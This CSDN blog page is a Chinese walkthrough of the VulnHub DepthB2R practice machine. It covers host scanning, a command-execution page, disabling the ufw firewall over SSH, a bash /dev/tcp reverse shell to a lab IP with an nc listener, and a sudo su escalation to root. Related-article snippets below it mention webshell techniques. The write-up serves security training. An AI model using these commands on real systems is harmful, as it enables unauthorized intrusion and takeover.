DepthB2R.ova

最新推荐文章于 2024-09-17 20:18:24 发布
最新推荐文章于 2024-09-17 20:18:24 发布
阅读量104 收藏
点赞数
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77565393/article/details/131943100
版权
通过sudonetdiscover和nmap进行主机扫描,发现开放端口和系统服务。利用dirsearch扫目录找到debug页面,进一步获取用户信息和系统进程详情。尽管nmap未显示SSH,但通过ufw防火墙管理发现其存在。关闭防火墙后,通过反弹shell技术建立连接,并成功从bill用户提权至root。
摘要由CSDN通过智能技术生成

主机发现

sudo netdiscover -i eth0 -r 192.168.47.0/24

主机信息探测

 nmap -p- 192.168.47.136

扫目录

dirsearch -u "192.168.47.136:8080"

发现test.jsp 打开看看,是一个debug页面,提示输入ls -l /tmp

ls -l /home 发现bill用户

ps aux查看进程发现竟然有ssh,但是为什么nmap没有扫描到呢?猜测有防火墙

查看/etc目录,果然有防火墙,ufw

尝试关闭防火墙

ssh bill@localhost sudo ufw disable

尝试反弹shell 同时本地开启监听

ssh bill@localhost bash -i >& /dev/tcp/192.168.47.128/2222
0>&1
nc -nvlp 4444

成功反弹shell

提权

尝试提权

sudo -l
sudo su

成功

pink三石
关注
asr1000-rommon.163-2r.pkg
12-22
asr1000-rommon.163-2r.pkg
HaloSmar.1wypaalt2r.gaKNUHX
03-22
很抱歉,但根据您给出的信息,标题"**HaloSmar.1wypaalt2r.gaKNUHX**"和描述"**HaloSmar.1wypaalt2r.gaKNUHX**"看起来并不是一个清晰的IT知识点或者问题描述。它们可能是某种代码、加密串或者是错误信息,但没有足够...
vulnhub系列:DepthB2R
jq_j37的博客
08-03 306
vulnhub系列:DepthB2R靶机,打靶文章
VulnHub DepthB2R 靶机渗透
Shadow的博客
04-08 384
DepthB2R 靶机渗透 目标:得到root权限 作者:shadow 时间:2021-04-08 请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 主机ip为172.16.1.22 nmap -p- -A -T5 172.16.1.22 只开放了8080端口,我们看看是什么 二、web渗透 没什么发现,试试nikto扫描下 ni
DepthB2R
weixin_53626662的博客
08-10 186
2.直接输入sudo su,提权成功。4.拼接目录/test.jsp。进来后,可能存在命令执行漏洞。
DepthB2R靶机
zdd1453691081的博客
08-04 322
【代码】DepthB2R靶机。
depthb2r靶机
weixin_73074638的博客
08-06 166
访问robots.txt,得知该目标为 apche /tomact 8.0.38 ubuntu操作系统上网查找nday,未发现可利用的。执行ls -l/tmp。访问test.jsp。
DepthB2R靶机复现
weixin_52956666的博客
08-02 285
访问192.168.112.149:8080。靶机IP为192.168.112.149。输入ls -l /home查看用户。发现失败,感觉像是ssh服务被关闭。这个靶机比较友好,不需要进行设置。输入ls -l发现存在命令执行。sudo -l查看免密操作。拼接/test.jsp。尝试进行反弹shell。sudo su直接提权。在kali上开启监听。
DepthB2R靶机渗透测试
weixin_58786230的博客
08-03 249
【代码】DepthB2R靶机渗透测试。
DepthB2R靶场实战【超详细】
weixin_68615160的博客
08-05 361
输入ls -la /home,发现root 和bill用户。发现ssh服务开放,之前端口扫描没扫到,可能是开了防火墙。sudo -l查看具有sudo权限的命令程序。有一个test.jsp,我们访问它。kali开启监听,成功反弹shell。显示所有用户,直接sudo su。查看/etc下,防火墙是存在的。反弹未能成功,我们看一下进程。访问其8080web服务。发现开启了8080端口。提示我们可以输入命令。我们尝试反弹shell。我们对该端口进行扫描。
【vulnhub】DepthB2R 打靶渗透
weixin_62162207的博客
08-07 224
DepthB2R 打靶渗透
3s_2r.rar_Simulink 3s/2s变换模型
07-14
标题中的“3s_2r.rar_Simulink 3s/2s变换模型”指的是一个使用Simulink实现的3s/2s变换的模型,这个模型被封装在一个名为"3s_2r.rar"的压缩文件里。3s/2s变换是一种电路理论中的变换方法,常用于分析和设计电力电子...
jixiebi2R.zip_2R机械臂_Planar Robot_动力方程_平面机械臂_机械臂matlab
07-14
平面2R机械臂matlab仿真代码,动力学方程!
funcSADL2R.zip_SAD_stereo matching
07-14
标题中的"funcSADL2R.zip_SAD_stereo matching"揭示了这是一个关于立体匹配(stereo matching)的代码库,其中使用了SAD(Sum of Absolute Differences)算法。SAD算法是计算机视觉领域中一种基本的图像匹配方法,...
Hutool:Java开发者的瑞士军刀
技术无疆
09-16 924
在Java的世界里,有这样一个工具库,它小巧而强大,功能丰富且易于使用,它就是Hutool。Hutool是一个Java工具包,旨在减少Java开发人员在开发过程中需要编写的重复代码。它就像瑞士军刀一样,为开发者提供了各种实用的工具,让开发工作更加高效。
dedecms(四种webshell姿势)
2301_81881972的博客
09-14 1168
点击【系统】【sql命令行工具】--》多行命令中输入select '<?>' into outfile '+路径+创建文件名。与WPCMS类似,直接修改模板拿WebShel..点击【模板】--》【默认模板管理】【index.htm】-->【修改】在文件修改中添加一句话代码.....如下。点击【模块】【广告管理】--》〔【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】账号密码同为admin。
WEB打点
ubaichu的博客
09-15 1291
web打点的思路,waf绕过思路
CTFShow-反序列化
最新发布
qq_66013948的博客
09-17 964
private变量会被序列化为:\x00类名\x00变量名protected变量会被序列化为: \x00*\x00变量名public变量会被序列化为:变量名__sleep() //在对象被序列化之前运行 *__wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符是会绕过) *如果类中同时定义了 __unserialize() 和 __wakeup() 两个魔术方法, 则只有 __unserialize() 方法会生效,
F=zeros(length(z),1); for i=1:length(z) Phi=@(theta,R,r)(z(i)+lc-lm).*r.R.(R-r.sin(theta))./... ((R.^2+r.^2-2R.*r.*sin(theta)).sqrt(R.^2+r.^2+(z(i)+lc-lm).^2-2R.*r.*sin(theta)))+... (z(i)-lc+lm).*r.R.(R-r.sin(theta))./... ((R.^2+r.^2-2R.*r.*sin(theta)).sqrt(R.^2+r.^2+(z(i)-lc+lm).^2-2R.*r.*sin(theta)))+... (z(i)+lc+lm).*r.R.(R-r.sin(theta))./... ((R.^2+r.^2-2R.*r.*sin(theta)).sqrt(R.^2+r.^2+(z(i)+lc+lm).^2-2R.*r.*sin(theta)))+... (z(i)-lc-lm).*r.R.(R-r.sin(theta))./... ((R.^2+r.^2-2R.r.sin(theta)).sqrt(R.^2+r.^2+(z(i)-lc-lm).^2-2R.r.sin(theta))); F(i)=BrNI/(4lc(Rc-rc))integral3(Phi,0,2pi,rc,Rc,rm,Rm); end
07-11
Sure! Here's your code with comments added: ```matlab F = zeros(length(z), 1); % Initialize the F vector with zeros for i = 1:length(z) % Define the Phi function using anonymous function ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值